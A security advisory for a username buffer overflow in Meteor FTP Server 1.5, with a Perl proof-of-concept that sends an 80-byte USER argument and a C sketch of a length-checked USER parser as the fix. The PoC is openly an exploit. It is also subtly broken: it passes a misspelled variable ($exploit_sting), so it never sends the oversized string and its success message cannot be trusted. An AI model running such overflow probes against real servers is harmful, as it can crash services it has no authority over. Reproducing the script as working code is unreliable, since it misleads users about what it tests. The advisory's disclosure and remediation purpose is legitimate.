Meteor FTP Server Buffer Overflow (username)
Summary
Meteor FTP is "a personal FTP server designed for the Microsoft Windows 98 and Windows Millennium Edition operating systems".
A buffer overflow vulnerability exists in Meteor FTP Server's handling of the username parameter. The following exploit code can be used to determine whether your version of Meteor FTP Server is vulnerable.
Credit:
Details
Vulnerable Systems:
* Meteor FTP Server version 1.5
#!/usr/bin/perl
#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5
# bug found by Anix44@gmail.com
#
# coded by k0r0l from acolytez team
# visit http://acolytez.com for details
#
use Net::FTP;
# getting data
$host = $ARGV[0];
$port = $ARGV[1];
$debug = $ARGV[2];
# ===========
$ftp_error = "Unable";
if (($host) && ($port))
{
    # make exploit string
    $exploit_string = "USER ";
    $exploit_string .= "X"x80;
    #$exploit_string .= "\n\n\n\n"; - it will be new return point !
    # ===================
    print "Trying to connect to $host:$port\n";
    $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
    print "[+] Connect OK!\n";
    print "Sending string...\n";
    $sock->login($exploit_sting, "testpassword");
    $answer = $sock->message;
    if ($answer =~ m/$ftp_error/i)
    {
        print "\n[-] Sorry! Failed\n";
    } else
    {
        print "\n[+] Send ok!\nServer can be explorated!\n\n";
    }
}
else
{
    print "\nMeteor FTP Server - PoC Exploit\n http://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}
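
The server-side fix for this class of bug is to check the length of the USER argument before copying it anywhere. The C sketch below is an added example, not Meteor FTP's code and not part of the PoC above; it parses one control-channel line and answers with the RFC 959 reply codes 331, 501 or 500. The names parse_user, is_user_verb and the USER_MAX limit of 32 are assumptions, since the advisory does not give the real buffer size.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed limit: the advisory does not state Meteor FTP's real buffer size. */
#define USER_MAX 32

/* Return 1 if the line starts with "USER " (the verb is case-insensitive). */
static int is_user_verb(const char *line, size_t len)
{
    if (len < 5 || line[4] != ' ')
        return 0;
    for (size_t i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "USER"[i])
            return 0;
    return 1;
}

/* Parse one control-channel line of len bytes. Returns 331 and writes the
 * NUL-terminated name to out only when the argument is valid; 501 when it is
 * empty, too long or non-printable; 500 when the line is not a USER command.
 * The length is checked before any byte is copied. */
int parse_user(const char *line, size_t len, char *out, size_t out_len)
{
    if (!is_user_verb(line, len))
        return 500;
    while (len > 5 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                          /* drop the trailing CRLF */
    size_t n = len - 5;
    if (n == 0 || n > USER_MAX || n >= out_len)
        return 501;
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)line[5 + i]))
            return 501;
    memcpy(out, line + 5, n);
    out[n] = '\0';
    return 331;
}

int main(void)
{
    char name[USER_MAX + 1], big[5 + 80 + 2 + 1] = "USER ";
    memset(big + 5, 'X', 80);           /* constructed: 80-byte name, as in the PoC */
    memcpy(big + 85, "\r\n", 3);
    printf("%d\n", parse_user("USER alice\r\n", 12, name, sizeof name));
    printf("%d\n", parse_user(big, strlen(big), name, sizeof name));
    return 0;
}
```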